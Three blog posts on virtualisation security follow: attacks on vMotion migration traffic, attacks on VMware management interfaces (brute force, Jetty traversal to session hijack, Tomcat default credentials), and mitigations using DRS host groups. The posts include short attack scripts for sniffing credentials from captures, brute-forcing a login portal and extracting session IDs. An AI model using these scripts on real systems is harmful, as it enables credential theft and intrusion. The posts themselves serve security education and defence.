Attacking additional virtualisation infrastructure

10 02 2015

I should start by stating that almost all documentation regarding live migration, High Availability (HA) and Fault Tolerance configurations states that these networks should be isolated and not shared with, or accessible by, unauthorised individuals. In an article, (Siebert, 2011) specifically advises to:

“Keep management and storage traffic, for instance, on a physically isolated network that’s away from the regular VM network traffic”

However, this does not diminish the argument that this information is still being moved around inside the environment, and should these guidelines be overlooked or the networks breached, the consequences can be difficult to appreciate for staff only familiar with traditional methods.

Live migration traffic

Live migration can be used to move machines between hosts located in the same blade chassis, across campuses and even across continents, with minimal downtime (Travostino, et al., 2006). Performing a live migration from one host to another is a common feature found in many of the larger virtualisation platforms such as Xen and VMware. In the VMware environment, moving a machine across hosts can be a manual process, or an automated one when combined with other features such as DRS and DPM (Distributed Power Management). While the DRS feature has been discussed in numerous earlier posts, DPM enables vCenter to automate the movement of machines off hosts during quiet periods of usage, allowing those hosts to be powered down and thus reducing power consumption. It is my personal opinion that live migration is one of the more intriguing introductions of virtualisation, as the information held in RAM is so sensitive.

Using the test environment I will demonstrate what is possible when access to the vMotion network is obtained. For this example a vMotion has been initiated specifying that VM1 on ESX1 is to be migrated – only the host portion is required to move, not the datastore. The VM will be moved to the only other host in the cluster, ESX2. To understand how this process is vulnerable to attack, I will first break down the steps involved in this operation (Kutz, 2007); a small simulation sketch follows the list:

  1. The request is made specifying the VM and which host it will be moved to.
  2. All of the RAM of VM1 is copied over the vMotion network to ESX2; any changes made during this time on ESX1 are recorded in a memory bitmap on ESX1.
  3. VM1 is quiesced on ESX1 and the memory recorded in the bitmap is copied over the vMotion network to ESX2.
  4. VM1 is started on ESX2 and requests for the VM are directed to the instance on ESX2.
  5. The remaining memory of VM1 is copied from ESX1, while memory is still being read from and written to VM1 on ESX1.
  6. Once successful, VM1 is unregistered on ESX1 and the task is complete.
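
To make the interplay between the pre-copy rounds and the memory bitmap in steps 2–5 more concrete, below is a small toy simulation of the process. It is a conceptual sketch only: the page count, dirtying rate and stop-and-copy threshold are invented values and bear no relation to VMware's actual implementation.

    # Toy simulation of the iterative pre-copy phase of a live migration.
    # All numbers here are invented for illustration.
    import random

    PAGES = 1024            # pretend the VM has 1024 memory pages
    STOP_COPY_LIMIT = 16    # assumed threshold at which the VM is quiesced

    dirty = set(range(PAGES))   # initially every page must be sent to ESX2
    rounds = 0

    while len(dirty) > STOP_COPY_LIMIT:
        rounds += 1
        sent = len(dirty)
        dirty.clear()           # copy the current dirty set over the vMotion network
        # while copying, the still-running VM keeps writing to memory,
        # so a subset of pages becomes dirty again (tracked in the bitmap)
        dirty.update(random.sample(range(PAGES), k=random.randint(1, PAGES // 10)))
        print(f"round {rounds}: sent {sent} pages, {len(dirty)} dirtied during the copy")

    print(f"quiescing VM and sending the final {len(dirty)} pages from the bitmap")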

In Figure 1 we see a basic visual representation of the process in the test environment. For demonstration purposes and ease of displaying the results, I have a separate vMotion network that uses a hub to connect the two machines. This allows me to sniff the traffic without having to perform an additional attack such as a MiTM or configure port mirroring (SPAN/RSPAN).

Figure 1: Basic visual representation of the process of a machine being migrated to another host in the test environment

In the virtual machine that will be moved, I have written information into a text file but not saved it to disk, so that we can be sure it is located in the machine's memory. In this example the information is a representation of a secure document containing a username and password. The text file and its content are shown in Figure 2.

Figure 2: An unsaved text file that has been written on the running virtual machine

I now initiate a vMotion request and start a packet capture on the vMotion network using Wireshark. The network card is configured in promiscuous mode to allow it to capture all of the packets being transmitted on the network. After the vMotion process has finished and the capture has been stopped, I am able to follow the TCP stream of the communication that took place between the two hosts and view the information in a searchable form. As shown in Figure 3, the information in the document is viewable in clear text, although separated by some punctuation.

Figure 3: A TCP stream of communication between the two hosts showing the notepad content
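
Wireshark's "Follow TCP Stream" works well interactively, but the same check can be scripted against a saved capture. The sketch below is a minimal example using scapy; it assumes the capture has been saved as vmotion.pcap and that vMotion is using its default TCP port of 8000 – adjust both for your own environment.

    # Minimal sketch: search a saved vMotion capture for readable text,
    # roughly what "Follow TCP Stream" plus a keyword search does in Wireshark.
    import re
    from scapy.all import rdpcap, TCP, Raw

    packets = rdpcap("vmotion.pcap")                 # assumed capture file name
    payload = b"".join(bytes(p[Raw]) for p in packets
                       if TCP in p and Raw in p and 8000 in (p[TCP].sport, p[TCP].dport))

    # pull out printable ASCII runs of eight or more characters,
    # then flag anything that looks like credential material
    for s in re.findall(rb"[ -~]{8,}", payload):
        if b"password" in s.lower() or b"username" in s.lower():
            print(s.decode("ascii", errors="replace"))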

Although this example used a notepad document to demonstrate the ability to sniff data, there are much greater risks to consider when addressing passive snooping attacks on migration traffic. Windows stores LM authentication hashes for active sessions in memory (Pilkington, 2012) in all current versions. As a result, should a passive snooping attack take place while a machine is locked or logged on, the LM hash will also be visible in the capture. Windows LM hashes can also be cracked back to the user's original password using online services such as (OS – Objectif Securite, 2012) and other hash cracking tools. Finally, and possibly of most concern, is the accessibility of encryption keys. Even when full disk encryption is used to secure data, the keys (after initial user input) are cached in memory by the operating system. On traditional hardware this is considered the safest place, as volatile memory is erased quickly once power is removed, and exploiting it usually requires physical access to the machine unless it is already infected. With live migration, however, it becomes possible to sniff the cached encryption key as the machine's memory crosses the network.

Live migration traffic is not only vulnerable to sniffing attacks. In a paper written in 2007, (Oberheide, et al., 2007) describe a number of attacks that are possible against live migration traffic. In the paper the researchers discuss three 'classes' of threat that can be used against live migration environments:

  • Control plane
  • Data plane
  • Migration module

Control plane attacks

Control plane attacks target the mechanisms that are employed to initiate and manage migrations within the infrastructure manager. While no working control plane attacks were demonstrated in the paper, the theory behind them is still relevant and should be considered in a risk analysis exercise. The examples that (Oberheide, et al., 2007) highlight demonstrate how successful attacks on the control plane could result in:

  • The migration of machines onto illegitimate hosts that are owned by the attacker.
  • Mass migration of a large number of machines, thus overloading the network and causing disruption to service.
  • Manipulation of resource management for hosts in a DRS-style environment, so that workloads are not evenly distributed and single hosts become overwhelmed.

Data plane attacks

Data plane attacks are threats that take place on the networks over which the migrations travel. The passive snooping attack demonstrated previously is one of the attacks briefly mentioned in the paper. The second attack in the data plane class is described as 'active manipulation'. As the name suggests, active manipulation is when data is changed during the migration of the machine. Although (Oberheide, et al., 2007) introduce their custom tool Xensploit for performing this attack, it is merely a collection of existing attacks collated into one tool for ease of use. The attack works by using MiTM techniques to intercept traffic between the two hosts and manipulate sections of the traffic (RAM) during transit. In their example, (Oberheide, et al., 2007, p. 4) showed how the attack could be used to establish an SSH (Secure Shell) session to a machine configured to only allow connections from authorised sources. Using Xensploit they were able to manipulate the object code of the sshd process in memory to add their key as an authorised source, allowing them to SSH in once the new instance had completed its migration.
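
To illustrate what 'active manipulation' means at the byte level, the sketch below performs the same kind of in-place substitution on a local buffer that a MiTM tool would perform on memory pages in transit. It is purely conceptual: the marker, the keys and the buffer are invented placeholders, and this is not how Xensploit itself is implemented.

    # Conceptual sketch of active manipulation: rewrite a chunk of migrating
    # guest memory by swapping a known byte pattern for attacker-chosen bytes
    # of the same length. All values below are invented placeholders.
    def tamper(memory_chunk: bytes, marker: bytes, replacement: bytes) -> bytes:
        if len(replacement) != len(marker):
            raise ValueError("in-place tampering must preserve the chunk length")
        return memory_chunk.replace(marker, replacement)

    legit_key = b"ssh-rsa AAAAB3...legit-admin-key"
    rogue_key = b"ssh-rsa AAAAB3...rogue-key------"   # padded to the same length
    page = b"header" + legit_key + b"trailer"         # stand-in for a memory page
    print(tamper(page, legit_key, rogue_key))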

Migration module attacks

Lastly, although these attacks are included in the paper, I feel this section falls under my earlier posts on the hypervisor rather than under live migration. The paper briefly covers attacks that exploit vulnerabilities in the migration module that forms part of the VMM (virtual machine monitor).

Combining attacks

Access to any of these attack classes should be considered a high risk by security staff, although with access to just one of the vectors it may still not be possible for an attacker to target a specific machine, depending on its physical location. If a combination of the attacks were available, the attacker would be able to leverage them to gain better control of the environment. An example of this is the data plane class of attacks: they are only useful if the target machine is being migrated during the period of capture. In environments where features such as DRS and DPM are not in use, machines may stay fixed to a host for a considerable period of time. If the attacker were able to utilise an attack at the control plane, they could trigger the migration of the necessary machines so that the attack could then take place at the data plane.

Shortly after the paper was released, VMware's (Wu, 2008) commented on this attack:

“Although impressive, this work by no means represents any new security risk in the datacentre… Rather, it is a reminder of how an already-compromised network, if left unchecked, could be used to stage additional severe attacks in any environment, virtual or physical.”

While I can appreciate what (Wu, 2008) is saying, I must disagree that these types of attack are comparable to those on physical environments. Data in transit on physical systems does not tend to include such sensitive information, and it is better understood in traditional systems that insecure protocols such as email and FTP should not be used to transfer confidential information. While the previous example required physical access to the vMotion network, it is also possible to access this data remotely through misconfiguration, access to the management interface or manipulation of the virtual infrastructure.

Wu, W., 2008. VMware Security & Compliance Blog. [Online] Available at: http://blogs.vmware.com/security/2008/02/keeping-your-vm.html

Siebert, E., 2011. Five VMware security breaches that should never happen. [Online] Available at: http://searchvmware.techtarget.com/tip/Five-VMware-security-breaches-that-should-never-happen

Travostino, F., Daspit, P. & Gommans, L., 2006. Seamless live migration of virtual machines over the MAN/WAN. Future Generation Computer Systems – IGrid 2005: The global lambda integrated facility, 22(8), pp. 901-907.

Kutz, A., 2007. How to obtain, configure and use VMotion and how VMotion works. [Online] Available at: http://searchvmware.techtarget.com/tip/How-to-obtain-configure-and-use-VMotion-and-how-VMotion-works

Pilkington, M., 2012. Protecting Privileged Domain Accounts: LM Hashes — The Good, the Bad, and the Ugly. [Online] Available at: http://computer-forensics.sans.org/blog/2012/02/29/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly

Oberheide, J., Cooke, E. & Jahanian, F., 2007. Empirical Exploitation of Live Virtual Machine Migration. [Online] Available at: http://www.eecs.umich.edu/techreports/cse/2007/CSE-TR-539-07.pdf





Attacking management interfaces

29 09 2014

The management interfaces, and everything incorporated into their software, are in the author's opinion the most problematic area in virtualisation security today. There have been numerous attempts over the last few years to demonstrate how management interfaces can be breached. The majority of these are general attacks that use pre-existing methods such as brute forcing, MiTM (man-in-the-middle) and the numerous flaws in the PKI model. There are multiple proven attack methods available for exploiting management interfaces, and below are descriptions of some of those discovered by researchers.

In an online blog post, (Mluft, 2011) describes how a brute force attack is achievable against the Amazon Web Services (AWS) portal by leveraging existing hacking tools. In the attack, (Mluft, 2011) demonstrated how it is possible to determine a successful logon using the exemplary payloads in Burp Suite (Burp Suite, 2012). Burp Suite is used here simply to automate the process of attempting logins against the interface. A failed login attempt to the portal is identified by a returned HTTP status code of 200 (Network Working Group, 1999), while a correct password attempt is identified by a returned HTTP status code of 302. Using the documentation provided by Amazon in relation to password policies, (Mluft, 2011) created an appropriate wordlist and used Burp Suite to attempt all the possible permutations. After 400,000 attempts the attack was paused and the results filtered for the 302 status code. The code was found, shown alongside the password that had been attempted. This gave the attacker the username and password for the administration of all servers managed by that account. It should be noted that all of these attempts originated from a single IP address without the account being locked out or subject to any throttling.
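
The core of that attack is nothing more than distinguishing those two status codes. A minimal sketch of the same logic is shown below; the portal URL and form field names are placeholders rather than the real AWS login parameters, which Burp Suite handled in the original write-up.

    # Sketch of the status-code check described above: a failed login re-renders
    # the form (HTTP 200) while a successful one redirects (HTTP 302).
    # The endpoint and field names are placeholders, not the real AWS portal.
    import requests

    LOGIN_URL = "https://portal.example.com/login"    # placeholder endpoint

    def try_password(email: str, password: str) -> bool:
        resp = requests.post(LOGIN_URL,
                             data={"email": email, "password": password},
                             allow_redirects=False, timeout=10)
        return resp.status_code == 302                # 302 = successful logon

    for candidate in ["Passw0rd", "Summer2011", "letmein1"]:
        if try_password("victim@example.com", candidate):
            print("valid credentials found:", candidate)
            break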

As discussed in my earlier blog article regarding the hypervisor, the Virtualization Assessment Toolkit (VASTO) has been developed to exploit multiple weaknesses, predominantly in the VMware family. As well as the identification module that returns the exact version of the server, it includes numerous attacks on virtual systems, including a specific VMware brute forcing module which mimics the attack on the AWS portal by (Mluft, 2011). One of the main contributors to the VASTO project, (Criscione, 2010), demonstrated a number of its different functions at Blackhat USA 2010. Although (Criscione, 2010) demonstrated how VASTO can be used at multiple layers of the virtual stack (client, hypervisor, support, management and internal), the majority of the talk concentrated on the management portion. (Criscione, 2010) confirms that although the (VMware, 2012) hardening guide recommends segmentation of management networks, these recommendations are often ignored and the interfaces are left situated on the same networks as traditional servers.

These servers that manage the entire fabric of the infrastructure have multiple attack vectors – from the operating systems they are installed on to the web services running the interfaces. Vulnerabilities in any one of these platforms can potentially jeopardise the security of an entire environment and should be taken very seriously.

The other VASTO modules that target the management portion of the virtual infrastructure use flaws in VMware components and their implementation to expose threats in the infrastructure. One of the exploits included in the VASTO suite that best demonstrates how multiple components in these systems can be chained for exploitation originates in a flaw in the Jetty (Eclipse, 2012) web server used by vCenter Update Manager. In the author's opinion, this attack shows how the complexity and code overhead that these management servers introduce make securing virtual environments a task that needs to be understood and prioritised. I will briefly give a breakdown of this attack to highlight the multiple elements that were used to complete it.

The Update Manager component of the vSphere suite is designed to secure the environment by automating the patching and updating of hosts that fall under its management scope. However, (Criscione, 2010) recognised that Update Manager requires a version of the Jetty web server to operate, an additional component added to the total footprint of the management server. The version of Jetty installed prior to version 4.1 u1 (update 1) of Update Manager was vulnerable to a directory traversal attack (Wilkins, 2009), which allowed attackers to view any file on the server that the Windows SYSTEM user had privileges to read. Crucially, vCenter stores a file on the server called “vpxd-profiler-*”, which is used by administrators for debugging purposes. This extensive file contains the SOAP session IDs of all the users that have connected to that server. With such an ID, the vmware_session_rider module found in the VASTO toolkit acts as a proxy, allowing the attacker to connect through it to the vCenter server using the selected administrator's SOAP session ID. Once this is completed, the attacker is able to create a new admin credential within vCenter to ensure future access.
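
Once the profiler file has been retrieved via the traversal flaw, the remaining work is extracting the session identifiers from it. The sketch below shows the general idea only; the regular expression is a simplified guess at the record format and is purely illustrative – VASTO's vmware_session_rider module performs the real parsing and then proxies the connection.

    # Illustrative only: pick candidate SOAP session IDs out of a previously
    # retrieved vpxd-profiler file. The pattern below is an assumed, simplified
    # record format, not the exact layout of the real file.
    import re

    with open("vpxd-profiler-output.txt", errors="replace") as fh:
        profiler = fh.read()

    session_ids = set(re.findall(r"/SessionStats/[^\n]*?/Id='([^']+)'", profiler))
    for sid in sorted(session_ids):
        print("candidate SOAP session id:", sid)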

Another example of how different elements of the management interface could be used to gain access to vCenter is through VMware's use of Apache Tomcat (The Apache Software Foundation, 2012). When navigating to a vCenter server through a web browser, one is presented with the standard vSphere “Getting started” screen, as shown in Figure 1.

Figure 1: Web browser connection to vCenter server

Connecting to that same server's IP address, but specifying Tomcat's default index page port of 8443 over an SSL connection, shows further information, including a link to log in as the “Tomcat manager”. This page is shown in Figure 2.

Figure 2: The web interface seen when navigating to vCenter on port 8443

In VMware version 4.1 there is a user named “VMwareAdmin” that is automatically added to the Tomcat server and has full admin rights to the Tomcat service. In earlier versions of VMware, the password for this admin account was 5 characters long: three uppercase letters, one number and one lowercase letter. This leaves an attacker with a number of options. The most obvious is to brute force the credentials with a compatible tool or script such as the Apache Tomcat brute force tool (Snipt, 2011). A second (and more sophisticated) attack would be to use the directory traversal vulnerability introduced by the Jetty service to gain read access to the server. From there the attacker could navigate to the “tomcat-users.xml” file (C:\Program Files\VMware\Infrastructure\tomcat\conf), as shown in Figure 3, which in VMware 4.1 contains the clear text credentials of the account.
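
It is worth putting a number on how weak that password structure is. Assuming the pattern really is three uppercase letters, one digit and one lowercase letter in a fixed order, the arithmetic below shows the full keyspace is under five million candidates; the guess rate used is an arbitrary figure for illustration.

    # Keyspace for the assumed pattern: 3 uppercase letters, 1 digit, 1 lowercase letter
    keyspace = 26 ** 3 * 10 * 26          # = 4,569,760 candidates
    guesses_per_second = 100              # illustrative rate against the Tomcat manager
    hours = keyspace / guesses_per_second / 3600
    print(f"{keyspace:,} candidates, worst case ~{hours:.1f} hours at {guesses_per_second} guesses/s")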

Figure 3: (left) The tomcat-users.xml file showing the username and password of a default admin account; (right) the Tomcat manager login prompt

Using this access, an attacker is able to control elements of the web service with admin rights. As shown in Figure 4, one is able to change a number of settings through the Tomcat interface, including uploading custom WAR files, which can be created using Metasploit to deliver Meterpreter payloads to the server.

Figure 4: Logged in to the Tomcat manager using the credentials found on the server

Although some of the attacks using the VASTO toolkit are specific and use vulnerabilities that have almost all been patched by VMware (at the time of writing), the management interfaces are still vulnerable to more general network attacks that are not as simple to fix as applying a patch or updating to the newest version. As explained briefly in my post on hypervisors, access to these interfaces is vulnerable to MiTM attacks and to the implementation's dependence on a highly insecure certificate/PKI model. These vulnerabilities are not directly the responsibility of the vendors, but certainly nothing has been done by them to address the issue.

I will not be explaining the process of how MiTM attacks and flaws in the certificate infrastructure can be used to capture login credentials, as this is a fundamental part of security and has been covered on numerous occasions by multiple sources (Irongeek, 2012) (Schneier, 2011). I have also written about the overarching problems with the certificate model and how it can be bypassed in a blog post from 2011.

Mluft, 2011. The Key to your Datacenter. [Online] Available at: http://www.insinuator.net/2011/07/the-key-to-your-datacenter/

Criscione, C., 2010. Blackhat 2010 – Virtually Pwned. USA: Youtube.

Wilkins, G., 2009. Vulnerability in ResourceHandler and DefaultServlet with aliases. [Online] Available at: http://jira.codehaus.org/browse/JETTY-1004

Irongeek, 2012. Using Cain to do a “Man in the Middle” attack by ARP poisoning. [Online] Available at: http://www.irongeek.com/i.php?page=videos/using-cain-to-do-a-man-in-the-middle-attack-by-arp-poisoning

Schneier, B., 2011. Schneier on Security. [Online] Available at: http://www.schneier.com/blog/archives/2011/09/man-in-the-midd_4.html





Mitigation techniques for hypervisors

3 01 2014

There are both vendor-specific and vendor-agnostic network security mitigation techniques that can be used to eliminate scanning of, and direct connection to, the hypervisor. These include IDS/IPS (Intrusion Detection Systems / Intrusion Prevention Systems) on the network portion – to detect and block known scanning patterns performed by common scanning tools – and vendor-specific hardening options such as VMware's Lockdown Mode (VMware, 2012), which turns off the ability to connect directly to the host with anything other than vCenter's 'vpxuser' account. However, there are many known evasion techniques available to bypass IDS/IPS systems, and while direct connections may be rejected by VMware's Lockdown Mode, vulnerabilities in the hypervisor code may still leave other communication channels open to abuse; this would be the case with any hypervisor.
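
For completeness, Lockdown Mode can be enabled programmatically as well as through the vSphere client. The sketch below uses the pyVmomi SDK to switch it on for every host a vCenter manages; the hostname and credentials are placeholders and certificate verification is disabled purely for lab use, so treat it as an outline rather than production code.

    # Enable Lockdown Mode on all managed hosts via pyVmomi (outline only).
    import ssl
    from pyVim.connect import SmartConnect, Disconnect
    from pyVmomi import vim

    ctx = ssl._create_unverified_context()             # lab use only
    si = SmartConnect(host="vcenter.example.com", user="administrator",
                      pwd="password", sslContext=ctx)  # placeholder credentials
    try:
        content = si.RetrieveContent()
        view = content.viewManager.CreateContainerView(
            content.rootFolder, [vim.HostSystem], True)
        for host in view.view:
            try:
                host.EnterLockdownMode()               # block direct host access
                print("lockdown enabled on", host.name)
            except vim.fault.AdminDisabled:
                print("lockdown already enabled on", host.name)
    finally:
        Disconnect(si)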

In the author's opinion, hypervisors should be situated on their own network/subnet, with strict ACLs in place, making them directly inaccessible to anyone outside a limited scope of technical staff. Few systems in traditional networks require this kind of isolation from users, as most need at least some level of user interaction to provide their services. While this measure should be sufficient to eliminate attacks performed directly on the hypervisors, additional layers of defence such as IDS/IPS and hypervisor-specific hardening mechanisms such as VMware's Lockdown Mode should be used in parallel, to further ensure the integrity of the host.

Unfortunately these network layers of protection do not address the issue of VM escape attacks, as mentioned in my last post. To address this, technicians should apply the same security mentality to the hypervisor layer that has previously been applied to the network layer. Depending on the size and nature of a virtualisation platform, layers should be applied to this new portion of the infrastructure. One of these layers should mitigate a worst case scenario, where an attacker targets less secured and more accessible VMs on the infrastructure in order to attack higher-value VMs running on the same hypervisor. To do this (again depending on the size and risk model of the environment), clusters could be configured to divide virtual machines into categories based on their security rating and group them accordingly. While this may reduce the total ROI that virtualisation offers – the larger the resource pools are, in terms of the number of shared hardware elements, the more efficient the use of hardware and the lower the overheads – it is beneficial from a security perspective. This cost should be offset against the likelihood and impact of this kind of attack when justifying the increased cost of grouping machines by security rating.

One method of eliminating the threat of machines running on the same hypervisor, even in an automated resource allocation environment such as VMware's DRS (Distributed Resource Scheduler), is to utilise the groups and rules available in the management suite. A specific example of this is in the latest version of VMware's vCenter (version 5), where there are options to collate groups/clusters of machines and set preferences for which hypervisor they are situated on. Although this feature is intended for grouping and separating machines from a resource and availability perspective, the author considers that it could also be used to protect machines against many hypervisor attacks, as well as other attacks which will be discussed in a later post.

In the example below, the author demonstrates a method for ensuring that machines with differing security classes are not located on the same physical host in automated distributed resource environments, using the resource rules in the VMware vCenter suite. This is done by assigning virtual machines to groups based on the security rating the organisation considers them to have. This method of using machine groups for security purposes in DRS environments is one that the author has not seen documented or discussed elsewhere.


Using vCenter groups for segmentation

In this example, the author has set up a simple scenario demonstrating how the rules in VMware's vCenter suite can be used to prevent a group of machines considered insecure from running on the same hypervisor/host as another group considered secure.

Using DRS groups, two groups are created – 'Secure-servers' and 'Insecure'. Machines are associated with the appropriate group based on their service etc.

A rule is created specifying that all servers in the 'Secure-Server' group must run on ESX1

Another rule is created specifying that all machines in the 'Insecure' group must not run on ESX1
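
The same groups and rules can also be created programmatically, which makes it easier to keep them consistent as machines are added. The sketch below is an outline, using the pyVmomi SDK, of how the two rules shown above might be built; the cluster, host and VM names are placeholders from this lab, object lookup is simplified, and the 'must run on ESX1' behaviour is expressed by attaching ESX1 to a host group, so treat it as a starting point rather than a finished script.

    # Outline: recreate the "must run on ESX1" / "must not run on ESX1" DRS rules
    # with pyVmomi. Names are lab placeholders; error handling is omitted.
    import ssl
    from pyVim.connect import SmartConnect, Disconnect
    from pyVmomi import vim

    def find(content, vimtype, name):
        """Return the first managed object of the given type with the given name."""
        view = content.viewManager.CreateContainerView(content.rootFolder, [vimtype], True)
        return next(obj for obj in view.view if obj.name == name)

    ctx = ssl._create_unverified_context()            # lab use only
    si = SmartConnect(host="vcenter.example.com", user="administrator",
                      pwd="password", sslContext=ctx)
    try:
        content = si.RetrieveContent()
        cluster = find(content, vim.ClusterComputeResource, "Cluster1")
        esx1 = find(content, vim.HostSystem, "esx1.example.com")
        secure_vms = [find(content, vim.VirtualMachine, n) for n in ("VM1", "VM2")]
        insecure_vms = [find(content, vim.VirtualMachine, n) for n in ("VM3", "VM4")]

        spec = vim.cluster.ConfigSpecEx(
            groupSpec=[
                vim.cluster.GroupSpec(operation="add",
                    info=vim.cluster.HostGroup(name="Secure-hosts", host=[esx1])),
                vim.cluster.GroupSpec(operation="add",
                    info=vim.cluster.VmGroup(name="Secure-servers", vm=secure_vms)),
                vim.cluster.GroupSpec(operation="add",
                    info=vim.cluster.VmGroup(name="Insecure", vm=insecure_vms)),
            ],
            rulesSpec=[
                vim.cluster.RuleSpec(operation="add",
                    info=vim.cluster.VmHostRuleInfo(
                        name="Secure-servers-must-run-on-ESX1",
                        enabled=True, mandatory=True,
                        vmGroupName="Secure-servers",
                        affineHostGroupName="Secure-hosts")),
                vim.cluster.RuleSpec(operation="add",
                    info=vim.cluster.VmHostRuleInfo(
                        name="Insecure-must-not-run-on-ESX1",
                        enabled=True, mandatory=True,
                        vmGroupName="Insecure",
                        antiAffineHostGroupName="Secure-hosts")),
            ],
        )
        cluster.ReconfigureComputeResource_Task(spec=spec, modify=True)
    finally:
        Disconnect(si)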

These rules could be scaled depending on the size or risk index determined by the organisation. There is also scope within these rules to balance the resource/security overhead by specifying that a machine 'should not' run on a certain host rather than 'must not'. It should also be noted that VMware's vCloud Datacenter offers a “Dedicated VDC” option, which provides “physically separate hardware – ideal for meeting security or regulatory requirements, where physically sharing isn't an option” (Lodge, 2010).

Lodge, M., 2010. Getting rid of noisy neighbors: Enterprise class cloud performance and predictability. [Online] Available at: http://blogs.vmware.com/rethinkit/2010/09/getting-rid-of-noisy-cloud-neighbors.html